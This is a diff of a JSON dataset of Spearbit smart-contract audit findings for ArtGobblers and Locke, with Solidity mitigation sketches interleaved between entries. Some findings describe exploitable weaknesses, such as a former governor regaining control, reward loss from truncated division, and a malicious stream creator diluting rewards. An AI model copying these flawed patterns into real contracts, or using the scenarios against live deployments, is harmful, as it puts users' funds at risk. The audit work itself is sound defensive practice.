+ "title": "Potential issues due to slippage when minting legendary gobblers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The price of a legendary mint is a function of the number of gobblers minted from goo. Because of the strict check that the price is exactly equal to the number of gobblers supplied, this can lead to slippage issues. That is, if there is a transaction that gets mined in the same block as a legendary mint, and before the call to mintLegendaryGobbler, the legendary mint will revert. uint256 cost = legendaryGobblerPrice(); if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost);", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] },
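One possible way to address the slippage finding above would be to let the caller pass a budget and bound the live price by it, instead of requiring an exact match; this maxCost pattern is a hedged sketch of a mitigation, not ArtGobblers' actual code:

contract SlippageSketch {
    error IncorrectGobblerAmount(uint256 cost);

    uint256 public currentPrice = 69; // stand-in for legendaryGobblerPrice()

    // Accept any supply >= cost up to the caller's budget, so a same-block
    // mint that moves the price no longer reverts the transaction.
    function mintLegendary(uint256[] calldata gobblerIds, uint256 maxCost) external view {
        uint256 cost = currentPrice;
        if (cost > maxCost || gobblerIds.length < cost) revert IncorrectGobblerAmount(cost);
        // a real implementation would burn gobblerIds[0..cost) and mint the legendary here
    }
}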
That means for example if there is an issue with the current hardcoded owner() there is no way to update it and liquidities/assets in the public/private vaults would also be at risk.", + "title": "Users who claim early have an advantage in goo production", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The gobblers are revealed in ascending order of the index in revealGobblers. However, there can be cases when this favours users who were able to claim early: 1. There is the trivial case where a user who claimed a day earlier will have an advantage in gooBalance as their emission starts earlier. 2. For users who claimed the gobblers on the same day (in the same period between a reveal) the advantage depends on whether the gobblers are revealed in the same block or not. 1. If there is a large number of gobbler claims between two aforementioned gobblers, then it may not be possible to call revealGobblers, due to block gas limit. 2. A user at the beginning of the reveal queue may call revealGobblers for enough indices to reveal their gobbler early. In all of the above cases, the advantage is being early to start the emission of the Goo.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "ROUTER() can not be updated for private or public vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "ROUTER() is an immutable data for any ClonesWithImmutableArgs.clone that uses AstariaVault- Base. That means for example if there is an issue with the current hardcoded ROUTER() or that it needs to be upgraded, the current public/private vaults would not be able to communicate with the new ROUTER.", + "title": "Add a negativity check for decayConstant in the constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Price is designed to decay as time progresses. For this, it is important that the constant decayConstant is negative. Since the value is derived using an on-chain logarithm computation once, it is useful to check that the value is negative. Also, typically a decay constant is positive; for example, in radioactive decay the negative sign is explicitly added in the decay function. It is worth keeping the same convention here, i.e., keep decayConstant as a positive number and add the negative sign in the getPrice function. However, this may cause a small increase in gas and therefore may not be worth implementing in the end.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Wrong return parameter type is used for getOwed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Both variations of getOwed use _getOwed and return uint192. But _getOwed returns a uint88.", + "title": "Consideration on possible Chainlink integration concerns", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The ArtGobbler project relies on the Chainlink v1 VRF service to reveal minted gobblers and assign a random emissionMultiple that can range from 6 to 9. The project has estimated that minting and revealing all gobblers will take about 10 years.
In the scenario simulated by the discussion \"Test to mint and reveal all the gobblers\" the number of requestRandomSeed and fulfillRandomness calls made to reveal all the minted gobblers was more than 1500. Given the timespan of the project, the number of requests made to Chainlink to request a random number and the fundamental dependency on Chainlink VRF v1, we would like to highlight some concerns: What would happen if Chainlink completely discontinues the Chainlink VRF v1? At the current moment, Chainlink has already released VRF v2, which replaces and enhances VRF v1. What would happen in case of a Chainlink service outage and for some reason they decide not to process previous requests? Currently, the ArtGobbler contract does not allow requesting a new \"request for randomness\". What if fulfillRandomness always gets delayed by a large number of days and users are not able to reveal their gobblers? This would not allow them to know the value of the gobbler (rarity and the visual representation) and start compounding $GOO, given the fact that the gobbler does not have an emission multiple associated yet. What if, by mistake or on purpose (malicious behavior), a Chainlink operator calls fulfillRandomness multiple times, changing the randomSeed during a reveal phase (the reveal of X gobblers can happen in multiple stages)?", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Document and reason about which functionalities should be frozen on protocol pause", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "On protocol pause, a few functions are allowed to be called. Some instances are noted above. There is no documentation on why these functionalities are allowed while the remaining functions are frozen.", + "title": "The function toString() does not return a string aligned to a 32-byte word boundary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "It is a good practice to align memory regions to 32-byte word boundaries. This is not necessarily the case here. However, we do not think this can lead to issues.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Wrong parameter type is used for s.strategyValidators", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "s.strategyValidators is of type mapping(uint32 => address) but the provided TYPE in the con- text is of type uint8.", + "title": "Considerations on Legendary Gobbler price mechanics", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The auction price model is made in a way that starts from a startPrice and decays over time. Each time a new auction starts, the starting price will be equal to max(69, prevStartPrice * 2). Users in this case are incentivized to buy the legendary gobbler as soon as the auction starts because by doing so they are going to burn the maximum allowed amount of gobblers, allowing them to maximize the final emission multiple of the minted legendary gobbler. By doing this, you reach the end goal of maximizing the account's $GOO emissions. By waiting, the cost price of the legendary gobbler decays, and so does the achievable emission multiple (because you can burn fewer gobblers).
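Tied to the Chainlink VRF concerns above ("the ArtGobbler contract does not allow requesting a new request for randomness"), one possible escape hatch is to let a randomness request be re-issued once a pending one is overdue. This is a hedged sketch; the names, the grace period, and the virtual request stub are assumptions, not ArtGobblers code or Chainlink API.

pragma solidity ^0.8.0;

abstract contract RandomnessRetrySketch {
    error FulfillmentNotOverdue();

    uint256 public lastRandomnessRequestTime; // set whenever a request is issued
    uint256 public constant FULFILLMENT_GRACE_PERIOD = 3 days; // assumed policy

    function _requestRandomnessFromVRF() internal virtual returns (bytes32 requestId);

    // If the oracle never answers (outage, VRF v1 sunset, withheld fulfillment),
    // a fresh request can be issued after the grace period instead of the
    // reveal process being stuck forever. Access control elided for brevity.
    function retryRandomSeed() external returns (bytes32) {
        if (block.timestamp < lastRandomnessRequestTime + FULFILLMENT_GRACE_PERIOD) {
            revert FulfillmentNotOverdue();
        }
        lastRandomnessRequestTime = block.timestamp;
        return _requestRandomnessFromVRF();
    }
}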
This means that if a user has enough gobblers to burn, he/she will burn them as soon as the auction starts. Another reason to mint a legendary gobbler as soon as the auction starts (and so burn as many gobblers as possible) is to make the next auction starting price as high as possible (always for the same reason, to be able to maximize the legendary gobbler emissions multiple). The next auction starting price is determined by legendaryGobblerAuctionData.startPrice = uint120(cost < 35 ? 69 : cost << 1); These mechanisms and behaviors can result in the following consequences: Users that have a huge number of gobblers will burn them as soon as possible, preventing others who can't afford it from waiting for the price to decay. There will be fewer and fewer \"normal\" gobblers available to be used as part of the \"art\" aspect of the project. In the discussion \"Test to mint and reveal all the gobblers\" we have simulated a scenario in which a whale would be interested in collecting all gobblers with the end goal of maximizing $GOO production. In that scenario, when the last Legendary Gobbler is minted we have estimated that 9644 gobblers have been burned to mint all the legendaries.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Some functions do not emit events, but they should", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "AstariaRouter.sol#L268 : Other filing endpoints in the same contract and also CollateralToken and LienToken emit FileUpdated(what, data). But fileGuardian does not.", + "title": "Define a LEGENDARY_GOBBLER_INITIAL_START_PRICE constant to be used instead of hardcoded 69", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "69 is currently the starting price of the first legendary auction and will also be the price of the next auction if the previous one (that just finished) was lower than 35. There isn't any gas benefit to using a constant, but it would make the code cleaner and easier to read compared to having hard-coded values directly.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "setNewGuardian can be changed to a 2 or 3 step transfer of authority process", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The current guardian might pass a wrong _guardian parameter to setNewGuardian which can break the upgradability of the AstariaRouter using fileGuardian.", + "title": "Update ArtGobblers comments about some variables/functions to make them more clear", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "Some comments about state variables or functions could be improved to make them clearer or remove any further doubts. LEGENDARY_AUCTION_INTERVAL /// @notice Legendary auctions begin each time a multiple of these many gobblers have been minted. It could make sense that this comment specifies \"minted from Goo\", otherwise someone could think that the \"free\" mints (mintlist, legendary, reserved) could also count to determine when a legendary auction starts. EmissionData.lastTimestamp // Timestamp of last deposit or withdrawal.
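A minimal sketch of how the constant suggested in the LEGENDARY_GOBBLER_INITIAL_START_PRICE finding above could read, with a named threshold as well; LEGENDARY_GOBBLER_RESTART_THRESHOLD is an assumed name, only the first constant's name comes from the finding.

pragma solidity ^0.8.0;

contract LegendaryStartPriceSketch {
    uint120 public constant LEGENDARY_GOBBLER_INITIAL_START_PRICE = 69;
    // Doubling a cost below 35 would land under the 69 floor (34 * 2 = 68),
    // so the auction restarts from the initial start price instead.
    uint120 public constant LEGENDARY_GOBBLER_RESTART_THRESHOLD = 35;

    // Same rule as uint120(cost < 35 ? 69 : cost << 1), with named constants.
    function nextStartPrice(uint120 cost) public pure returns (uint120) {
        return cost < LEGENDARY_GOBBLER_RESTART_THRESHOLD
            ? LEGENDARY_GOBBLER_INITIAL_START_PRICE
            : cost << 1;
    }
}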
These comments should be updated to cover all the scenarios where lastBalance and lastTimestamp are updated. Currently, they are updated in many more cases, for example: mintLegendaryGobbler revealGobblers transferUserEmissionMultiple getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) has an outdated comment. The line currently present in the mintLegendaryGobbler function has the following comment: getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) // Must be done before minting as the transfer hook will update the user's emissionMultiple. In both ArtGobblers and GobblersERC1155B there isn't any transfer hook, which could mean that the comment is referencing outdated code. We suggest removing or updating the comment to reflect the current code implementation. legendaryGobblerPrice numMintedAtStart calculation. The variable numMintedAtStart is calculated as (numSold + 1) * LEGENDARY_AUCTION_INTERVAL The comment above the formula does not explain why it uses (numSold + 1) instead of numSold. This reason is correctly explained by a comment on the LEGENDARY_AUCTION_INTERVAL declaration. It would be better to also update the comment related to the calculation of numMintedAtStart to explain why the current formula uses (numSold + 1) instead of just numSold. transferUserEmissionMultiple The above utility function transfers an amount of a user's emission multiple to another user. Other than transferring that emission amount, it also updates both users' lastBalance and lastTimestamp. The natspec comment should be updated to cover this information.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "There are no range/value checks when some parameters get fileed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are no range/value checks when some parameters get fileed. For example: There are no hardcoded range checks for the ...Numerators and ...Denominators, so that the protocol's users can trustlessly assume the authorized users would not push these values into ranges seemed unac- ceptable. When an address get updated, we don't check whether the value provided is address(0) or not.", + "title": "Mark functions not called internally as external to improve code quality", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ArtGobblers-Spearbit-Security-Review.pdf", + "body": "The following functions could be declared as external to save gas and improve code quality: Goo.mintForGobblers Goo.burnForGobblers Goo.burnForPages GobblerReserve.withdraw", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "ArtGobblers", + "Severity: Informational" ] }, { - "title": "Manually constructed storage slots can be chosen so that the pre-image of the hash is unknown", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In the codebase, some storage slots are manually constructed using keccak256 hash of a string xyz.astaria. .... The pre-images of these hashes are known.
This can allow in future for actors to find a potential path to those storage slots using the keccak256 hash function in the codebase and some crafted payload.", + "title": "UnaccruedSeconds does not increase even if nobody is actively staking", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The unstreamed variable tracks whether someone is staking in the contract or not. However, because of the division precision loss at Locke.sol#L164-L166 and Locke.sol#L187, unstreamed > 0 may happen even when everyone has already withdrawn all deposited tokens from the contract, i.e. ts.tokens = 0 for everyone. Consider the following proof of concept with only two users, Alice and Bob: streamDuration = 8888 At t = startTime, Alice stakes 1052 wei of deposit tokens. At t = startTime + 99, Bob stakes 6733 wei of deposit tokens. At t = startTime + 36, both Alice and Bob exit from the contract. At this point Alice's and Bob's ts.tokens are both 0 but unstreamed = 1 wei. The abovementioned numbers are the result of a fuzzing campaign and were not carefully crafted; therefore, this issue can also occur under normal circumstances. function updateStreamInternal() internal { ... uint256 tdelta = timestamp - lastUpdate; if (tdelta > 0) { if (unstreamed == 0) { unaccruedSeconds += uint32(tdelta); } else { unstreamed -= uint112(tdelta * unstreamed / (endStream - lastUpdate)); } } ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: High Risk" ] }, { - "title": "Avoid shadowing variables", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The highlighted line declares a new variable owner which has already been defined in Auth.sol inherited by LienToken: address owner = ownerOf(lienId);", + "title": "Old governor can call acceptGov() after renouncing its role through _abdicate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The __abdicate function does not reset the pendingGov value to 0. Therefore, if a pending governor is set, that user can still become governor by calling acceptGov.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: High Risk" ] }, { - "title": "PublicVault.accrue is manually inlined rather than called", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The _accrue function locks in the implied value of the PublicVault by calculating, then adding to yIntercept, and finally emitting an event. This calculation is duplicated in 3 separate locations in PublicVault: In totalAssets In _accrue And in updateVaultAfterLiquidation", + "title": "User can lose their reward due to truncated division", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The truncated division can cause users to lose rewards in this update round, which may happen when any of the following conditions are true: 1. RewardToken.decimals() is too low. 2. Reward is updated too frequently. 3. StreamDuration is too large. 4. TotalVirtualBalance is too large (e.g., stake near the end of stream). This could potentially happen especially when the 1st case is true. Consider the following scenario: rewardToken.decimals() = 6. depositToken.decimals() can be anything (assume it's 18). rewardTokenAmount = 1K * 10**6.
streamDuration = 1209600 (two weeks). totalVirtualBalance = streamDuration * depositTokenAmount / timeRemaining where depositTokenAmount = 100K * 10**18 and timeRemaining = streamDuration (a user stakes 100K at the beginning of the stream) lastApplicableTime() - lastUpdate = 100 (about 7 block-times). Then rewards = 100 * 1000 * 10**6 * 10**18 / 1209600 / (1209600 * 100000 * 10**18 / 1209600) = 0.8267 < 1. User wants to buy the reward token at the price of 100K/1K = 100 deposit tokens but does not get any because of the truncated division. function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { // time*rewardTokensPerSecond*oneDepositToken / totalVirtualBalance uint256 rewards; unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: High Risk" ] }, { - "title": "CollateralToken.flashAction reverts with incorrect error", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Reverts with InvalidCollateralStates.AUCTION_ACTIVE when the address is not flashEnabled.", + "title": "The streamAmt check may prolong a user in the stream", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Assume that the amount of tokens staked by a user (ts.tokens) is low. This check allows another person to deposit a large stake in order to prolong the user in a stream (until streamAmt for the user becomes non-zero). For this duration the user would be receiving a bad rate or 0 altogether for the reward token while being unable to exit from the pool. if (streamAmt == 0) revert ZeroAmount(); Therefore, if Alice stakes a small amount of deposit token and Bob comes along and deposits a very large amount of deposit token, it's in Alice's interest to exit the pool as early as possible, especially when this is an indefinite stream. Otherwise the user would be receiving a bad rate for their deposit token.", "labels": [ "Spearbit", - "Astaria", - "Severity: Low Risk" + "Locke", + "Severity: Medium Risk" ] }, { - "title": "ClearingHouse can be deployed only when needed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When collateral is deposited, a Clearing House is automatically deployed.
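Plugging the numbers of the truncated-division scenario above into rewardPerToken (Solidity divides left to right, flooring each step) confirms that the payout rounds to zero:

\[
\text{rewards} = \left\lfloor \frac{\lfloor 100 \cdot 10^{9} \cdot 10^{18} / 1209600 \rfloor}{10^{23}} \right\rfloor = \left\lfloor \frac{\approx 8.267 \cdot 10^{22}}{10^{23}} \right\rfloor = \lfloor 0.8267 \rfloor = 0
\]

where 100 is the elapsed time, 10^9 = rewardTokenAmount, 10^18 = depositDecimalsOne, 1209600 = streamDuration, and 10^23 = totalVirtualBalance.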
However, these Clearing Houses are only needed if the collateral goes to auction at Seaport, either through liquidation or the collateral holder choosing to sell them. The Astaria team has indicated that this behavior is intentional in order to put the cost on the borrower, since liquidations are already expensive. I'd suggest the perspective that all pieces of collateral will be added to the system, but a much smaller percentage will ever be sent to Seaport. The aggregate gas spent will be much, much lower if we are careful to only deploy these contract as needed. Further, let's look at the two situations where we may need a Clearing House: 1) The collateral holder calls listForSaleOnSeaport(): In this case, the borrower is paying anyways, so it's a no brainer. 2) Another user calls liquidate(): In this case, they will earn the liquidation fees, which should be sufficient to justify a small increase in gas costs.", + "title": "Potential funds locked due to low token decimals and long stream duration", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "In cases where the deposit token's decimals are too low (4 or less) or when the remaining stream duration is too long, checking streamAmt > 0 may affect regular users. They could be temporarily blocked by the contract, i.e. they cannot stake, withdraw, or get rewards, and should wait until streamAmt > 0 or the stream ends. Although unlikely to happen, it still is a potential lock-of-funds issue. function updateStreamInternal() internal { ... if (acctTimeDelta > 0) { if (ts.tokens > 0) { uint112 streamAmt = uint112(uint256(acctTimeDelta) * ts.tokens / (endStream - ts.lastUpdate)); if (streamAmt == 0) revert ZeroAmount(); ts.tokens -= streamAmt; } ... }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Medium Risk" ] }, { - "title": "PublicVault.claim() can be optimized", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "For claim not to revert we would need to have msg.sender == owner(). And so when the following is called: _mint(owner(), unclaimed); Instead of owner() we can use msg.sender since reading the immutable owner() requires some calldata lookup.", + "title": "Sanity check on the reward tokens decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Add a sanity check on the reward token's decimals, which shouldn't exceed 33 because TokenStream.rewards has a uint112 type (2**112 is roughly 5.2 * 10**33, so 10**decimals no longer fits once decimals > 33).
constructor( uint64 _streamId, address creator, bool _isIndefinite, address _rewardToken, address _depositToken, uint32 _startTime, uint32 _streamDuration, uint32 _depositLockDuration, uint32 _rewardLockDuration, uint16 _feePercent, bool _feeEnabled ) LockeERC20( _depositToken, _streamId, _startTime + _streamDuration + _depositLockDuration, _startTime + _streamDuration, _isIndefinite ) MinimallyExternallyGoverned(msg.sender) // inherit factory governance { // No error code or msg to reduce bytecode size require(_rewardToken != _depositToken); // set fee info feePercent = _feePercent; feeEnabled = _feeEnabled; // limit feePercent require(feePercent < 10000); // store streamParams startTime = _startTime; streamDuration = _streamDuration; // set in shared state endStream = startTime + streamDuration; endDepositLock = endStream + _depositLockDuration; endRewardLock = startTime + _rewardLockDuration; // set tokens depositToken = _depositToken; rewardToken = _rewardToken; // set streamId streamId = _streamId; // set indefinite info isIndefinite = _isIndefinite; streamCreator = creator; uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one); // set lastUpdate to startTime to reduce codesize and first user's gas lastUpdate = startTime; }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Low Risk" ] }, { - "title": "Can remove incoming terms from LienActionBuyout struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Incoming terms are never used in the LienActionBuyout struct. The general flow right now is: incomingTerms are passed to VaultImplementation#buyoutLien. These incoming terms are validated and used to generate the lien information. The lien information is encoded into a LienActionBuyout struct. This is passed to LienToken#buyoutLien, but then the incoming terms are never used again.", - "labels": [ + "title": "Use a stricter bound for transferability delay", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "modifier transferabilityDelay { // ensure the time is after end stream if (block.timestamp < endStream) revert NotTransferableYet(); _; }", + "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Low Risk" ] }, { - "title": "Refactor updateVaultAfterLiquidation to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In updateVaultAfterLiquidation, we check if we're within maxAuctionWindow of the end of the If we are, we call _deployWithdrawProxyIfNotDeployed and assign withdrawProxyIfNearBoundary to epoch. the result. We then proceed to check if withdrawProxyIfNearBoundary is assigned and, if it is, call handleNewLiquidation. Instead of checking separately, we can include this call within the block of code executed if we're within maxAuc- tionWindow of the end of the epoch. This is true because (a) withdraw proxy will always be deployed by the end of that block and (b) withdraw proxy will never be deployed if timeToEnd >= maxAuctionWindow.", + "title": "Potential issue with malicious stream creator", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Assume that users staked tokens at the beginning.
The malicious stream creator could come and stake an extremely large amount of tokens, thus driving up the value of totalVirtualBalance. This means that users will barely receive rewards while giving away deposit tokens at the same rate. Users can exit the pool in this case to save their unstreamed tokens. function rewardPerToken() public override view returns (uint256) { if (totalVirtualBalance == 0) { return cumulativeRewardPerToken; } else { uint256 rewards; unchecked { rewards = (uint256(lastApplicableTime() - lastUpdate) * rewardTokenAmount * depositDecimalsOne) / streamDuration / totalVirtualBalance; } return cumulativeRewardPerToken + rewards; } }", "labels": [ "Spearbit", - "Astaria", - "Severity: Gas Optimization" + "Locke", + "Severity: Low Risk" ] }, { - "title": "Use collateralId to set collateralIdToAuction mapping", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "_listUnderlyingOnSeaport() sets collateralIdToAuction mapping as follows: s.collateralIdToAuction[uint256(listingOrder.parameters.zoneHash)] = true; Since this function has access to collateralId, it can be used instead of using zoneHash.", + "title": "Moving check require(feePercent < 10000) in updateFeeParams to save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "feePercent comes directly from LockeFactory's feeParams.feePercent, which is configured in the updateFeeParams function and used across all Stream contracts. Moving this check into the updateFeeParams function can avoid checking in every contract and thus save gas.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "Storage packing", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "RouterStorage: The RouterStorage struct represents state managed in storage by the AstariaRouter contract. Some of the packing in this struct is sub optimal. 1. maxInterestRate and minInterestBPS: These two values pack into a single storage slot, however, are never referenced together outside of the constructor. This means, when read from storage, there are no gas efficiencies gained. 2. Comments denoting storage slots do not match implementation. The comment //slot 3 + for example occurs far after the 3rd slot begins as the addresses do not pack together. LienStorage: 3. The LienStorage struct packs maxLiens with the WETH address into a single storage slot. While gas is saved on the constructor, extra gas is spent in parsing maxLiens on each read as it is read alone. VaultData: 4. VaultData packs currentEpoch into the struct's first slot, however, it is more commonly read along with values from the struct's second slot.", + "title": "Use calldata instead of memory for some function parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Having function arguments in calldata instead of memory is more optimal in the aforementioned cases. See the following reference.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "ClearingHouse fallback can save WETH address to memory to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The fallback function reads WETH() from ROUTER three times.
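A side-by-side sketch of the calldata recommendation above; the functions are hypothetical examples, not Locke code:

pragma solidity ^0.8.0;

contract CalldataSketch {
    // `calldata` arrays are read in place from the transaction payload.
    function sumCalldata(uint256[] calldata xs) external pure returns (uint256 s) {
        for (uint256 i = 0; i < xs.length; ++i) s += xs[i];
    }

    // `memory` arrays are first copied from calldata, costing extra gas per word.
    function sumMemory(uint256[] memory xs) public pure returns (uint256 s) {
        for (uint256 i = 0; i < xs.length; ++i) s += xs[i];
    }
}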
once and save to memory for the future calls.", + "title": "Update cumulativeRewardPerToken only once after stream ends", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Since cumulativeRewardPerToken does not change once it is updated after the stream ends, it has to be updated only once.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "CollateralToken's onlyOwner modifier doesn't need to access storage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The onlyOwner modifier calls to ownerOf(), which loads storage itself to check ownership. We can save a storage load since we don't need to load the storage variables in the modifier itself.", + "title": "Expression 10**one can be unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "uint256 one = ERC20(depositToken).decimals(); if (one > 33) revert BadERC20Interaction(); depositDecimalsOne = uint112(10**one);", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "Can stop loop early in _payDebt when everything is spent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a loan is sold on Seaport and _payDebt is called, it loops through the auction stack and calls _paymentAH for each, decrementing the remaining payment as money is spent. This loop can be ended when payment == 0.", + "title": "Calculation of amt can be unchecked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "The value newBal in this context is always greater than prevBal because of the check located at Locke.sol#534. Therefore, we can use unchecked subtraction.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "Can remove initializing allowList and depositCap for private vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Private Vaults do not allow enabling, disabling, or editing the allow list, and don't enforce a deposit cap, so seems strange to initialize these variables. Delegates are still included in the _validateCommitment function, so we can't get rid of this entirely.", + "title": "Change lastApplicableTime() to endStream", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Locke-Spearbit-Security-Review.pdf", + "body": "Since block.timestamp >= endStream in the abovementioned cases, the lastApplicableTime function will always return endStream.", "labels": [ "Spearbit", - "Astaria", + "Locke", "Severity: Gas Optimization" ] }, { - "title": "ISecurityHook.getState can be modified to return bytes32 / hash of the state instead of the state itself.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Since only the keccak256 of preTransferState is checked against the kec- cak256 hash of the returned security hook state, we could change the design so that ISecurityHook.getState returns bytes32 to save gas.
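A combined sketch of the two unchecked findings above (10**one and newBal - prevBal); the wrapper contract and the guarding checks are assumptions added for self-containment:

pragma solidity ^0.8.0;

contract UncheckedSketch {
    // 10**one cannot overflow once one <= 33 is enforced (2**112 ~ 5.2e33),
    // so the 0.8.x overflow check can be skipped.
    function depositDecimals(uint256 one) external pure returns (uint112) {
        require(one <= 33);
        unchecked { return uint112(10 ** one); }
    }

    // newBal - prevBal cannot underflow once newBal > prevBal is checked,
    // so the subtraction can also be unchecked.
    function delta(uint112 newBal, uint112 prevBal) external pure returns (uint112 amt) {
        require(newBal > prevBal);
        unchecked { amt = newBal - prevBal; }
    }
}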
